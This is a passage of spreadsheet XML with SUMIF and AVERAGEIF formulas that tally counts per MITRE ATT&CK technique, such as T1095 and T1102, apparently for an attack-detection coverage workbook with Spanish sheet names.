        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>4</v>
      </c>
      <c r="I22" s="322" t="str">
        <f t="shared" si="0"/>
        <v>4 (4)</v>
      </c>
      <c r="J22" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K22" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M22" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>6</v>
      </c>
      <c r="N22" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>6</v>
      </c>
      <c r="O22" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="P22" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q22" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S22" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>10</v>
      </c>
      <c r="T22" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>10</v>
      </c>
      <c r="U22" s="4" t="str">
        <f t="shared" si="2"/>
        <v>10 (10)</v>
      </c>
      <c r="V22" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W22" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>3</v>
      </c>
      <c r="Y22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>57</v>
      </c>
      <c r="Z22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>21</v>
      </c>
      <c r="AA22" s="322" t="str">
        <f t="shared" si="3"/>
        <v>21 (57)</v>
      </c>
      <c r="AB22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC22" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>17</v>
      </c>
      <c r="AE22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>42</v>
      </c>
      <c r="AF22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>12</v>
      </c>
      <c r="AG22" s="322" t="str">
        <f t="shared" si="4"/>
        <v>12 (42)</v>
      </c>
      <c r="AH22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>6</v>
      </c>
      <c r="AI22" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>5</v>
      </c>
      <c r="AK22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>99</v>
      </c>
      <c r="AL22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>33</v>
      </c>
      <c r="AM22" s="322" t="str">
        <f t="shared" si="5"/>
        <v>33 (99)</v>
      </c>
      <c r="AN22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>10</v>
      </c>
      <c r="AO22" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>17</v>
      </c>
      <c r="AQ22" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR22" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS22" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT22" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU22" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY22" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ22" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA22" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC22" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>10</v>
      </c>
      <c r="BD22" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>10</v>
      </c>
      <c r="BE22" s="4" t="str">
        <f t="shared" si="8"/>
        <v>10 (10)</v>
      </c>
      <c r="BF22" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>5</v>
      </c>
      <c r="BG22" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>3</v>
      </c>
      <c r="BI22" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>7</v>
      </c>
      <c r="BJ22" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>4</v>
      </c>
      <c r="BK22" s="322" t="str">
        <f t="shared" si="9"/>
        <v>4 (7)</v>
      </c>
      <c r="BL22" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM22" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>4</v>
      </c>
      <c r="BO22" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>61</v>
      </c>
      <c r="BP22" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>29</v>
      </c>
      <c r="BQ22" s="4" t="str">
        <f t="shared" si="10"/>
        <v>29 (61)</v>
      </c>
      <c r="BR22" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS22" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>5</v>
      </c>
      <c r="BT22" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU22" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>20</v>
      </c>
      <c r="BV22" s="292">
        <v>47</v>
      </c>
      <c r="BW22" s="322">
        <v>19</v>
      </c>
      <c r="BX22" s="4" t="str">
        <f t="shared" si="11"/>
        <v>19 (47)</v>
      </c>
      <c r="BY22" s="12">
        <v>2</v>
      </c>
      <c r="BZ22" s="13">
        <v>1</v>
      </c>
      <c r="CA22" s="394">
        <v>15</v>
      </c>
      <c r="CB22" s="288">
        <v>94</v>
      </c>
      <c r="CC22" s="4">
        <v>34</v>
      </c>
      <c r="CD22" s="4" t="str">
        <f t="shared" si="12"/>
        <v>34 (94)</v>
      </c>
      <c r="CE22" s="4">
        <v>2</v>
      </c>
      <c r="CF22" s="4">
        <v>1</v>
      </c>
      <c r="CG22" s="13">
        <v>1</v>
      </c>
      <c r="CH22" s="394">
        <v>15</v>
      </c>
    </row>
    <row r="23" spans="1:86" ht="15" customHeight="1">
      <c r="A23" s="4">
        <f t="shared" si="13"/>
        <v>21</v>
      </c>
      <c r="B23" s="4" t="str">
        <f>IFERROR(VLOOKUP(A23,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1095</v>
      </c>
      <c r="C23" s="493" t="str">
        <f>IFERROR(VLOOKUP(B23,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="D23" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B23)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E23" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F23" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G23" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>3</v>
      </c>
      <c r="H23" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I23" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (3)</v>
      </c>
      <c r="J23" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K23" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M23" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>4</v>
      </c>
      <c r="N23" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>4</v>
      </c>
      <c r="O23" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (4)</v>
      </c>
      <c r="P23" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>4</v>
      </c>
      <c r="Q23" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S23" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>7</v>
      </c>
      <c r="T23" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U23" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6 (7)</v>
      </c>
      <c r="V23" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W23" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>18</v>
      </c>
      <c r="Z23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>8</v>
      </c>
      <c r="AA23" s="322" t="str">
        <f t="shared" si="3"/>
        <v>8 (18)</v>
      </c>
      <c r="AB23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC23" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>12</v>
      </c>
      <c r="AF23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>9</v>
      </c>
      <c r="AG23" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (12)</v>
      </c>
      <c r="AH23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>9</v>
      </c>
      <c r="AI23" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>30</v>
      </c>
      <c r="AL23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>17</v>
      </c>
      <c r="AM23" s="322" t="str">
        <f t="shared" si="5"/>
        <v>17 (30)</v>
      </c>
      <c r="AN23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>17</v>
      </c>
      <c r="AO23" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ23" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR23" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS23" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT23" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU23" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>3</v>
      </c>
      <c r="AX23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>2</v>
      </c>
      <c r="AY23" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (3)</v>
      </c>
      <c r="AZ23" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA23" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC23" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>10</v>
      </c>
      <c r="BD23" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>8</v>
      </c>
      <c r="BE23" s="4" t="str">
        <f t="shared" si="8"/>
        <v>8 (10)</v>
      </c>
      <c r="BF23" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>8</v>
      </c>
      <c r="BG23" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI23" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ23" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK23" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL23" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM23" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO23" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>4</v>
      </c>
      <c r="BP23" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>3</v>
      </c>
      <c r="BQ23" s="4" t="str">
        <f t="shared" si="10"/>
        <v>3 (4)</v>
      </c>
      <c r="BR23" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS23" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT23" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU23" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>2</v>
      </c>
      <c r="BV23" s="292">
        <v>2</v>
      </c>
      <c r="BW23" s="322">
        <v>2</v>
      </c>
      <c r="BX23" s="4" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY23" s="12">
        <v>1</v>
      </c>
      <c r="BZ23" s="13">
        <v>1</v>
      </c>
      <c r="CA23" s="394">
        <v>2</v>
      </c>
      <c r="CB23" s="288">
        <v>4</v>
      </c>
      <c r="CC23" s="4">
        <v>4</v>
      </c>
      <c r="CD23" s="4" t="str">
        <f t="shared" si="12"/>
        <v>4 (4)</v>
      </c>
      <c r="CE23" s="4">
        <v>1</v>
      </c>
      <c r="CF23" s="4">
        <v>2</v>
      </c>
      <c r="CG23" s="13">
        <v>1</v>
      </c>
      <c r="CH23" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="24" spans="1:86" ht="15" customHeight="1">
      <c r="A24" s="4">
        <f t="shared" si="13"/>
        <v>22</v>
      </c>
      <c r="B24" s="4" t="str">
        <f>IFERROR(VLOOKUP(A24,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1102</v>
      </c>
      <c r="C24" s="493" t="str">
        <f>IFERROR(VLOOKUP(B24,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Web Service</v>
      </c>
      <c r="D24" s="493">
        <f>SUMPRODUCT(
